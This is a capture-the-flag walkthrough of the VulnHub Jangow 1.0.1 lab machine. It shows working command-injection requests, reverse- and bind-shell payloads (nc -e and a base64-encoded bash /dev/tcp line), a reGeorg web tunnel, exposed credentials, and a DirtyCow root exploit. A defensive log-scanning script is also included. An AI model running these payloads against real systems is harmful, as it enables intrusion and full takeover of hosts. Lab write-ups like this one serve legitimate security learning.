VulnHub Jangow 1.0.1 Walkthru

Getting Started

This is a walkthrough of how I solved Jangow 1.0.1 from Vulnhub, released 04/11/2021. It's described as an easy CTF and gives a hint that enumeration is important. This is the second CTF challenge I've ever done, and my first writeup. How did I do? What would you have done differently?

Booting the image in VirtualBox displays its IP address on the console:

Port Enumeration

I started with a port scan using nmap. The -F parameter scans only the 100 most common ports:

$ nmap -F -sV -sC 192.168.56.118
Starting Nmap 7.80 ( https://nmap.org ) at 2022-08-23 17:16 CEST
Nmap scan report for 192.168.56.118
Host is up (0.00045s latency).
Not shown: 98 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.18
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2021-06-10 18:05  site/
|_
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Index of /
Service Info: Host: 127.0.0.1; OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.82 seconds

We learn that this is an Ubuntu box running vsftpd 3.0.3 and Apache 2.4.18. I'll start a more thorough port scan in the background while I investigate these services:

$ nmap -sV -sC 192.168.56.118

Investigating FTP

Let's check for anonymous FTP access:

$ ftp ftp://anonymous:anonymous@192.168.56.118/

Nope. That's a dead end for now.

Investigating HTTP

The web root contains only a 'site' folder, and directory listings are enabled.

'Site' is just an empty web template. The only interesting thing is 'Buscar', which means search in Spanish, so it might contain something dynamic:

The search form calls a PHP script, busque.php, which returns nothing. Let's start some web recon in the background while we probe it.

$ feroxbuster --url http://192.168.56.118/site/

Let's see if we can inject a command into that busque.php script:

Too easy. We already have remote code execution as the www-data user. In fact, it works even without the semicolon. This is not particularly realistic. Let's continue our injection with cURL:

$ curl http://192.168.56.118/site/busque.php?buscar=ls
assets
busque.php
css
index.html
js
wordpress

$ curl http://192.168.56.118/site/busque.php?buscar=cat+busque.php
<?php system($_GET['buscar']); ?>

$ curl http://192.168.56.118/site/busque.php?buscar=ls+wordpress
config.php
index.html

$ curl http://192.168.56.118/site/busque.php?buscar=cat+wordpress/config.php
<?php
$servername = "localhost";
$database = "desafio02";
$username = "desafio02";
$password = "abygurl69";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) {
    die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
mysqli_close($conn);
?>

We've confirmed that all busque.php does is pass the buscar parameter straight to system(). We also find some database creds in wordpress/config.php. I wonder if www-data has permission to read the user flag:

$ curl http://192.168.56.118/site/busque.php?buscar=ls+/home
jangow01

$ curl http://192.168.56.118/site/busque.php?buscar=ls+/home/jangow01
user.txt

$ curl http://192.168.56.118/site/busque.php?buscar=cat+/home/jangow01/user.txt
d41d8cd98f00b204e9800998ecf8427e

OK, we got the flag and a username!

Trying for a shell

Let's try to get a reverse shell. On the local machine:

$ nc -lvp 51337

$ curl http://192.168.56.118/site/busque.php --get --data-urlencode "buscar=nc -e /bin/bash 192.168.56.1 51337 2>&1"
nc: invalid option -- 'e'
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
	  [-P proxy_username] [-p source_port] [-q seconds] [-s source]
	  [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
	  [-x proxy_address[:port]] [destination] [port]

OK, the OpenBSD netcat on the box has no -e option, so we can't use it. At this point I tried a few other reverse shells from PayloadsAllTheThings but received no output. I guess special characters are messing things up. Let's try base64-encoding the payload to get rid of them:

$ echo 'bash -i >& /dev/tcp/192.168.56.1/51337 0>&1'|base64 -w0
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEvNTEzMzcgMD4mMQo=

$ curl http://192.168.56.118/site/busque.php --get --data-urlencode "buscar=echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEvNTEzMzcgMD4mMQo=|base64 -d|bash"

This time, instead of returning nothing, it hung. Hmmm… is there a firewall blocking outbound connections?

$ curl http://192.168.56.118/site/busque.php --get --data-urlencode "buscar=curl 192.168.56.1:51337"
$ curl http://192.168.56.118/site/busque.php --get --data-urlencode "buscar=curl 192.168.56.1:80"
$ curl http://192.168.56.118/site/busque.php --get --data-urlencode "buscar=curl 192.168.56.1:443"

Hang, hang, hang. Even ports 80 and 443 are blocked. I wonder if inbound connections are blocked too:

$ curl 192.168.56.118:51337
$ curl 192.168.56.118:443

More hangs. We are firewalled in both directions, apart from the FTP and HTTP ports we already found open.

Setting up a web-based proxy server

We have RCE, but can't get a shell in either direction. Maybe we can upload a web-based proxy server and use it to tunnel through the firewall. Enter reGeorg:

https://github.com/sensepost/reGeorg

This tool consists of two parts: a script you drop on the web server, and a local SOCKS daemon that talks to it over HTTP. We could probably upload the script by base64-encoding it and piping it into a file, but there is an easier way. Remember those creds we found?

$ ftp ftp://jangow01:abygurl69@192.168.56.118/
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
200 Switching to Binary mode.
ftp> cd /tmp
250 Directory successfully changed.
ftp> put tunnel.nosocket.php
local: tunnel.nosocket.php remote: tunnel.nosocket.php
229 Entering Extended Passive Mode (|||30585|)
150 Ok to send data.
100% |*****************************************************************************************************************************************|  5974       31.82 MiB/s    00:00 ETA
226 Transfer complete.
5974 bytes sent in 00:00 (2.44 MiB/s)
ftp> chmod 777 tunnel.nosocket.php
200 SITE CHMOD command ok.
ftp> 

The jangow01 FTP account can't write to the web root, but we can drop the script in /tmp and then copy it into place through our command injection, which runs as www-data:

$ curl http://192.168.56.118/site/busque.php --get --data-urlencode "buscar=cp /tmp/tunnel.nosocket.php proxy.php 2>&1"

$ curl http://192.168.56.118/site/proxy.php
Georg says, 'All seems fine'

$ python2.7 reGeorgSocksProxy.py -u http://192.168.56.118/site/proxy.php

    
                     _____
  _____   ______  __|___  |__  ______  _____  _____   ______
 |     | |   ___||   ___|    ||   ___|/     \|     | |   ___|
 |     \ |   ___||   |  |    ||   ___||     ||     \ |   |  |
 |__|\__\|______||______|  __||______|\_____/|__|\__\|______|
                    |_____|
                    ... every office needs a tool like Georg

  willem@sensepost.com / @_w_m__
  sam@sensepost.com / @trowalts
  etienne@sensepost.com / @kamp_staaldraad
  
   
[INFO   ]  Log Level set to [INFO]
[INFO   ]  Starting socks server [127.0.0.1:8888], tunnel at [http://192.168.56.118/site/proxy.php]
[INFO   ]  Checking if Georg is ready
[INFO   ]  Georg says, 'All seems fine'
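As an added example (not part of the original walkthrough, and not code from the reGeorg project), here is what the defensive side of the two tricks above looks like. The script parses Apache access-log lines and flags two things: query values that look like OS commands being fed to busque.php, and a single client hammering one PHP file at the rate a web tunnel needs to keep its SOCKS session alive. The log lines are constructed for the example rather than captured from the box, the rule names and thresholds are assumptions chosen here, and the tunnel check deliberately keys on request rate rather than on reGeorg's specific parameters, so it also catches other web-tunnel tools.

```python
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlencode, urlsplit

# Apache common/combined format; fields after the status code are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# Heuristics for OS command injection in a decoded query value. The rule
# names are labels chosen for this example; "bare-command" in particular
# can fire on ordinary search terms and needs tuning per site.
INJECTION_RULES = {
    "shell-metachar": re.compile(r"[;|&`]|\$\("),
    "decode-and-exec": re.compile(r"base64\s+-d.*\b(ba)?sh\b"),
    "dev-tcp-redirect": re.compile(r"/dev/tcp/"),
    "sensitive-path": re.compile(r"(^|\s)/(etc|home|root|tmp|var)/"),
    "bare-command": re.compile(r"^(ls|id|whoami|cat|uname|nc|curl|wget|bash|sh)(\s|$)"),
}


def parse_line(line):
    """Split one log line into ip, timestamp, method, path and decoded params."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    parts = urlsplit(rec["uri"])
    rec["path"] = parts.path
    # parse_qs percent-decodes and turns '+' back into a space, so the value
    # we inspect is the same string that system() received on the box.
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def injection_indicators(rec):
    """Sorted names of the rules that fire on any query parameter value."""
    hits = set()
    for values in rec["params"].values():
        for value in values:
            for name, rule in INJECTION_RULES.items():
                if rule.search(value):
                    hits.add(name)
    return sorted(hits)


def polling_endpoints(records, window_seconds=60, threshold=20):
    """(ip, path) pairs that receive >= threshold hits inside one window.

    A web tunnel keeps the already-open HTTP port busy with a steady stream
    of requests to a single script; the rate is the signal, not any one body."""
    by_key = {}
    for rec in records:
        by_key.setdefault((rec["ip"], rec["path"]), []).append(rec["ts"])
    flagged = []
    for key, stamps in by_key.items():
        stamps.sort()
        start = 0
        for end, stamp in enumerate(stamps):        # sliding window
            while (stamp - stamps[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                flagged.append(key)
                break
    return sorted(flagged)


def scan(lines):
    """Return ([(uri, [rule, ...]), ...], [(ip, path), ...]) for a log."""
    records = [rec for rec in map(parse_line, lines) if rec]
    injections = []
    for rec in records:
        hits = injection_indicators(rec)
        if hits:
            injections.append((rec["uri"], hits))
    return injections, polling_endpoints(records)


# Constructed sample log modelled on the requests in the walkthrough; these
# lines were written for the example, not captured from the real box.
_T0 = datetime(2022, 8, 23, 17, 20, 0, tzinfo=timezone(timedelta(hours=2)))


def _line(offset, method, path, buscar=None):
    uri = path + ("?" + urlencode({"buscar": buscar}) if buscar is not None else "")
    stamp = (_T0 + timedelta(seconds=offset)).strftime("%d/%b/%Y:%H:%M:%S %z")
    return f'192.168.56.1 - - [{stamp}] "{method} {uri} HTTP/1.1" 200 512'


SAMPLE_LOG = [
    _line(0, "GET", "/site/index.html"),
    _line(5, "GET", "/site/busque.php", "jangow"),   # an ordinary search term
    _line(60, "GET", "/site/busque.php", "cat busque.php"),
    _line(90, "GET", "/site/busque.php", "cat /home/jangow01/user.txt"),
    _line(120, "GET", "/site/busque.php",
          "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEvNTEzMzcgMD4mMQo=|base64 -d|bash"),
] + [_line(300 + i, "POST", "/site/proxy.php") for i in range(30)]  # tunnel polling

if __name__ == "__main__":
    found, polling = scan(SAMPLE_LOG)
    for uri, hits in found:
        print("injection:", uri, hits)
    for ip, path in polling:
        print("polling:", ip, path)
```

Run it as a script to see the three injected requests with the rules they trip and the proxy.php endpoint flagged for polling; the ordinary 'jangow' search trips nothing. The design choice worth copying is the decode step: the detector inspects the same decoded string the PHP script handed to system(), so percent-encoding or '+' tricks in the raw request line don't hide the payload.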

Bind shell over the proxy tunnel

Now we need to run a bind shell on the box. We already have file upload via FTP, so let's not mess around with uploading through PHP. I grabbed the Perl bind shell from the PayloadsAllTheThings cheat sheet, dumped it into a file, uploaded it to /home/jangow01 and chmod 777'd it:

$ curl http://192.168.56.118/site/busque.php --get --data-urlencode "buscar=bash /home/jangow01/perlshell.sh 2>&1"

This command hung, which means it's listening. Now to connect through the SOCKS proxy:

$ nc -v -xlocalhost:8888 -X5 localhost 51337
Connection to localhost 8906 port [tcp/*] succeeded!
bash: cannot set terminal process group (2726): Inappropriate ioctl for device
bash: no job control in this shell
www-data@jangow01:/var/www/html/site$

We now have a prompt on the box and can upgrade it to an interactive shell:

$ python3 -c 'import pty; pty.spawn("/bin/bash")'

Getting root

This box is running Linux 4.4.0, which is vulnerable to DirtyCow. Upload this source file:

https://gist.githubusercontent.com/rverton/e9d4ff65d703a9084e85fa9df083c679/raw/9b1b5053e72a58b40b28d6799cf7979c53480715/cowroot.c

Compile it and run it:

$ gcc cowroot.c -o cowroot -pthread

$ ./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
Size of binary: 54256
Racing, this may take a while..
thread stopped
/usr/bin/passwd overwritten
Popping root shell.
Don't forget to restore /tmp/bak
thread stopped

$ cat /root/proof.txt
                       @@@&&&&&&&&&&&&&&&&&&&@@@@@@@@@@@@@@@&&&&&&&&&&&&&&                          
                       @  @@@@@@@@@@@@@@@&#   #@@@@@@@@&(.    /&@@@@@@@@@@                          
                       @  @@@@@@@@@@&( .@@@@@@@@&%####((//#&@@@&   .&@@@@@                          
                       @  @@@@@@@&  @@@@@@&@@@@@&%######%&@*   ./@@*   &@@                          
                       @  @@@@@* (@@@@@@@@@#/.               .*@.  .#&.   &@@@&&                    
                       @  @@@, /@@@@@@@@#,                       .@.  ,&,   @@&&                    
                       @  @&  @@@@@@@@#.         @@@,@@@/           %.  #,   %@&                    
                       @@@#  @@@@@@@@/         .@@@@@@@@@@            *  .,    @@                   
                       @@&  @@@@@@@@*          @@@@@@@@@@@             ,        @                   
                       @&  .@@@@@@@(      @@@@@@@@@@@@@@@@@@@@@        *.       &@                  
                      @@/  *@@@@@@@/           @@@@@@@@@@@#                      @@                 
                      @@   .@@@@@@@/          @@@@@@@@@@@@@              @#      @@                 
                      @@    @@@@@@@@.          @@@@@@@@@@@              @@(      @@                 
                       @&   .@@@@@@@@.         , @@@@@@@ *            .@@@*(    .@                  
                       @@    ,@@@@@@@@,   @@@@@@@@@&*%@@@@@@@@@,    @@@@@(%&*   &@                  
                       @@&     @@@@@@@@@@@@@@@@@         (@@@@@@@@@@@@@@%@@/   &@                   
                       @ @&     ,@@@@@@@@@@@@@@@,@@@@@@@&%@@@@@@@@@@@@@@@%*   &@                    
                       @  @@.     .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%*    &@&                    
                       @  @@@&       ,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%/     &@@&&                    
                       @  @@@@@@.        *%@@@@@@@@@@@@@@@@@@@@&#/.      &@@@@&&                    
                       @  @@@@@@@@&               JANGOW               &@@@                          
                       @  &&&&&&&&&@@@&     @@(&@ @. %.@ @@%@     &@@@&&&&                          
                                     &&&@@@@&%       &/    (&&@@@&&&                                
                                       (((((((((((((((((((((((((((((





da39a3ee5e6b4b0d3255bfef95601890afd80709

Leave a comment!
